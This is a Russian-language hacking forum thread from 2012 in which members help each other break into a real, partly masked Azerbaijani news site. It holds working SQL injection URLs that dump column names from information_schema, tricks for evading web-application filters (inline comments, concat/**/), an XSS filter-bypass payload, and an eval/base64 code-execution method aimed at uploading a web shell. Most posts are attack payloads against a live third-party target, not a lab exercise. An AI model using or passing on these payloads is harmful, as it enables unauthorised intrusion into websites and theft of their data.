Старый 12.01.2012, 17:55   #1601
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

в общем ты правильно понял Чем не обход кавычек. И равно - "=" - вообще не нужны, можно удалять (в коде base64_encode) - (с) Твост

Последний раз редактировалось Pashkela; 12.01.2012 в 17:57..
Pashkela вне форума   Ответить с цитированием
Старый 12.01.2012, 18:05   #1602
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Что сдесь происходит?

С исполнения кода не можем шелл залить уже пятнадцатый пост? Это точно тот форум?

По поводу кавычек с бейсом:
PHP код:
<?
eval($_GET[code]);
?>
.php?code=eval(base64_decode(cGhwaW5mbygpOw));

Ненадо там "==" писать, алгоритм без вас всё добавит.

dumb

Синтаксис php соблюдай и всё зальётся, хватит этой хернёй страдать =\
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 12.01.2012, 18:07   #1603
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от Pashkela
в общем ты правильно понял Чем не обход кавычек. И равно - "=" - вообще не нужны
В клиентских уязвимостях подобный метод тоже используется. Любые фильтры обходятся легко и быстро:
<input type=text name=a value=XSS>
XSS=YWxlcnQoJ3hzcycp onfocus=eval(atob(value)) autofocus
M_script вне форума   Ответить с цитированием
Старый 12.01.2012, 18:44   #1604
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Цитата:
.php?code=eval(base64_decode(cGhwaW5mbygpOw));

Ненадо там "==" писать, алгоритм без вас всё добавит.

dumb

Синтаксис php соблюдай и всё зальётся, хватит этой хернёй страдать =\
Блин, правда - все что нужно было знать...
Цитата:
С исполнения кода не можем шелл залить уже пятнадцатый пост? Это точно тот форум?
А ты сам виноват, где был) ток ты мне одним постом помочь можешь)

Спасибо M_script! В очередной раз на высоте!
dumb вне форума   Ответить с цитированием
Старый 13.01.2012, 08:36   #1605
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

http://***.az/?cat=news&id=85%27%20and(0)/*!union*/select%201,group_concat(0x3a,column_name),3,4,5,6, 7,8%20from%20information_schema.columns%20where%20 table_name=0x6964617265--%20-
/*!...*/ не помогает(

Последний раз редактировалось Twost; 21.08.2013 в 13:50..
salut вне форума   Ответить с цитированием
Старый 13.01.2012, 09:55   #1606
wwwMedic
 
Регистрация: 13.09.2011
Сообщений: 27
Репутация: 10
По умолчанию

все проще
http://www.***.az/?cat=news&id=-85'+union(select+1,2,3,4,5,6,7,8)--+
принтабельно 2,5,6
mysql 5.1.56

и кстати, там ошибка php, а не мускуля, как error-based ты бы в любом случае не раскрутил

Последний раз редактировалось Twost; 21.08.2013 в 13:50..
wwwMedic вне форума   Ответить с цитированием
Старый 13.01.2012, 11:48   #1607
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

не мне нужен column_name найти
http://www.***.az/?cat=news&id=85%27%20and(0)/*!union*/select%201,group_concat(0x3a,column_name),3,4,5,6, 7,8%20from%20information_schema.columns%20where%20 table_name=0x6964617265--%20-

Цитата:
Forbidden

You don't have permission to access / on this server.

Последний раз редактировалось Twost; 21.08.2013 в 13:50..
salut вне форума   Ответить с цитированием
Старый 13.01.2012, 12:13   #1608
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от salut Посмотреть сообщение
не мне нужен column_name найти
http://www.***.az/?cat=news&id=85%27%20and(0)/*!union*/select%201,group_concat(0x3a,column_name),3,4,5,6, 7,8%20from%20information_schema.columns%20where%20 table_name=0x6964617265--%20-
Мне кажется, тебе нужно прочитать что-нибудь.

Это реакция на group_concat
http://www.***.az/?cat=news&id=85'-- asdas >> true
http://www.***.az/?cat=news&id=85'-- group_concat() >> false

http://www.***.az/?cat=news&id=85' and(0)/*!union*/select 1,concat_ws(0x3a,column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x6964617265 limit 0,1-- -

Последний раз редактировалось Twost; 21.08.2013 в 13:51..
~d0s~ вне форума   Ответить с цитированием
Старый 13.01.2012, 13:06   #1609
ForeverFree
 
Регистрация: 11.10.2011
Сообщений: 24
Репутация: 0
По умолчанию

Подправлю,
Это реакция на "concat(":
Код:
http://www.***.az/?cat=news&id=85'%20and(0)/*!union*/select%201,concat(0x3a,column_name),3,4,5,6,7,8%20from%20information_schema.columns%20where%20table_name=0x6964617265%20limit%200,1--%20-
Которую можно обойти так:
Код:
http://www.***.az/?cat=news&id=85'%20and(0)/*!union*/select%201,concat/**/(0x3a,column_name),3,4,5,6,7,8%20from%20information_schema.columns%20where%20table_name=0x6964617265%20limit%200,1--%20-

Последний раз редактировалось Twost; 21.08.2013 в 13:51..
ForeverFree вне форума   Ответить с цитированием
Старый 13.01.2012, 18:07   #1610
pinch
 
Регистрация: 02.11.2010
Сообщений: 20
Репутация: 2
По умолчанию

подскажите альтернативу "concat". Есть инъекция, но там фильтр на "concat" и "group_concat"
pinch вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot